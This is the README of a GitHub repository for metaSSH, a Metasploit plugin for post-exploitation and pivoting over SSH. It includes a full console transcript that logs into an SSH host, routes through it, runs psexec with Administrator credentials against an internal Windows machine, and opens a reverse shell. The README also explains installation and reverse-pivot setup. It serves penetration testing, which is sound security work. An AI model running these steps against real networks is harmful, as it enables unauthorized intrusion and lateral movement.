Skip to content

dirtyfilthy/metassh

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

27 Commits
 
 
 
 
 
 
 
 

Repository files navigation

metaSSH session plugin for metasploit v0.1
==========================================

metaSSH is a session plugin for metasploit that gives you a meterpreter like interface over an ssh connection. When I started writing this code I just wanted to be able to cleanly reverse pivot over ssh from within metasploit but I guess I got a bit carried away. 


Features
--------

* Multi-channel
* SFTP over same connection
* Pivoting & reverse pivoting via "route"
* Scriptable
* Supports post-exploitation modules
* Meterpreter-like api 

Example
-------

Here is an example of using metaSSH to pivot through an ssh host at 192.168.56.3 to run psexec on a win2k box at 192.168.57.4, inside the internal subnet. The reverse tcp payload then reverse pivots (automagically) through our ssh box to give us a shell.

            =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
     + -- --=[ 778 exploits - 415 auxiliary - 121 post
     + -- --=[ 238 payloads - 27 encoders - 8 nops
     
     msf > setg LogLevel 3
     LogLevel => 3
     msf > load meta_ssh
     payloads/singles/ssh/metassh_session.rb
     exploits/multi/ssh/login_password.rb
     [*] Successfully loaded plugin: metaSSH
     msf > use multi/ssh/login_password
     msf > set RHOST 192.168.56.3
     RHOST => 192.168.56.3
     msf > set USER dsl
     USER => dsl
     msf > set PASS reverse
     PASS => reverse
     msf > set PAYLOAD ssh/metassh_session
     PAYLOAD => ssh/metassh_session
     msf > exploit -z
     [*] Connecting to dsl@192.168.56.3:22 with password reverse
     [*] metaSSH session 1 opened (127.0.0.1 -> 192.168.56.3:22) at 2011-12-28 03:51:16 +1300
     [*] Session 1 created in the background.
     msf > route add 192.168.57.0 255.255.255.0 1
     [*] Route added
     msf > use exploit/windows/smb/psexec
     msf > set RHOST 192.168.57.4
     RHOST => 192.168.57.4
     msf > set LHOST 192.168.57.3
     LHOST => 192.168.57.3
     msf > set LPORT 5557
     LPORT => 5557
     msf > set SMBUser Administrator
     SMBUser => Administrator
     msf > set SMBPass password
     SMBPass => password
     msf > set PAYLOAD windows/shell_reverse_tcp
     PAYLOAD => windows/shell_reverse_tcp
     msf > exploit
     [*] Started reverse handler on 192.168.57.3:5557 via the metaSSH on session 1
     [*] Connecting to the server...
     [*] Authenticating to 192.168.57.4:445|WORKGROUP as user 'Administrator'...
     [*] Uploading payload...
     [*] Created \ekuCbYaL.exe...
     [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.57.4[\svcctl] ...
     [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.57.4[\svcctl] ...
     [*] Obtaining a service manager handle...
     [*] Creating a new service (TCzOpXwW - "MvQGwrInlegXtnXAgQmQ")...
     [*] Closing service handle...
     [*] Opening service...
     [*] Starting the service...
     [*] Removing the service...
     [*] Closing service handle...
     [*] Deleting \ekuCbYaL.exe...
     [*] Command shell session 2 opened (127.0.0.1:43621 -> 127.0.0.1:50324) at 2011-12-28 03:51:18 +1300
     
     Microsoft Windows 2000 [Version 5.00.2195]
     (C) Copyright 1985-1999 Microsoft Corp.
     
     C:\WINNT\system32>^Z
     Background session 2? [y/N]  y
     msf  exploit(psexec) > sessions -i 1
     [*] Starting interaction with 1...
     
     metaSSH > help
     
     Core Commands
     =============
     
         Command       Description
         -------       -----------
         ?             Help menu
         background    Backgrounds the current session
         bgkill        Kills a background metaSSH script
         bglist        Lists running background scripts
         bgrun         Executes a metaSSH script as a background thread
         channel       Displays information about active channels
         close         Closes a channel
         exit          Terminate the ssh session
         help          Help menu
         info          Displays information about a Post module
         interact      Interacts with a channel
         irb           Drop into irb scripting mode
         quit          Terminate the ssh session
         run           Executes a metaSSH script or Post module
         use           Deprecated alias for 'load'
     
     
     Stdapi: System Commands     
     =======================
     
         Command       Description
         -------       -----------
         execute       Execute a command
         shell         Drop into a system command shell
     
     
     Stdapi: Net Commands
     ====================
     
         Command       Description
         -------       -----------
         portfwd       forward local port to remote port
     
     
     Stdapi: File system Commands
     ============================
     
         Command       Description
         -------       -----------
         cat           Read the contents of a file to the screen
         cd            Change directory
         del           Delete the specified file
         download      Download a file or directory
         edit          Edit a file
         getlwd        Print local working directory
         getwd         Print working directory
         lcd           Change local working directory
         lpwd          Print local working directory
         ls            List files
         mkdir         Make directory
         pwd           Print working directory
         rm            Delete the specified file
         rmdir         Remove directory
         search        Search for files
         upload        Upload a file or directory
     
     metaSSH >


Installation
------------

Make sure you are running the **latest** version of metasploit from github, metaSSH requires recent fixes to the bundled net/ssh library.

    git clone https://github.com/rapid7/metasploit-framework.git

Get the latest version of metaSSH

    git clone git@github.com:dirtyfilthy/metassh.git

Copy meta_ssh.rb & the meta_ssh directory to your metasploit plugins directory

    cp -r meta_ssh.rb meta_ssh ~/metasploit/plugins

Usage
-----

After installation in msfconsole run "load meta_ssh" to load the plugin. Two new exploit modules and one new payload module will become available. The exploits "multi/ssh/login_password" & "multi/ssh/login_pubkey" both let you login to an ssh server through different means and are fairly self explanatory. The payload for each of these must be "ssh/metassh_session" which will spawn metaSSH. 

For ease of use a command is also provided

   open_ssh -l LOGIN -c PASSWORD/KEYFILE HOST

### Pivoting

To get pivoting to work just add a route to your internal subnet through your metaSSH session like so:

    msf > route add 192.168.57.0 255.255.255.0 1

NOTE: For reverse pivoting GatewayPorts MUST be set to yes in sshd_config on your pivot box. At some point I'll probably add an emulation mode with mkfifo & netcat.

### Post-exploitation modules

To use run them from the metaSSH session just like meterpreter

    metaSSH > run post/linux/gather/checkvm
    
    [*] Gathering System info ....
    [+] This appears to be a VirtualBox Virtual Machine

Bugs
----

Forwarded ports (local and remote) are never released until the metaSSH session ends. For some reason I couldn't figure out, attempting to cancel port forwarding also kills any popped sessions. Any other bugs please open an issue on my github ( https://github.com/dirtyfilthy/metassh ). Pull requests/fixes gratefully accepted.

Acknowledgements
----------------

This code is based heavily on the meterpreter session code included with metasploit and has in many cases simply been "cargo culted" and altered. Thanks to RageLtMan for his contributions.

Author
-----

dirtyfilthy -- http://github.com/dirtyfilthy -- dirtyfilthee@gmail.com

About

ssh session type for metasploit

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages